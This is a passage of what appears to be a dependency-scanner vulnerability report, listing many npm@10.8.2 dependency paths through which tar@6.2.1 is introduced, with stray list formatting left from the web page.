  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
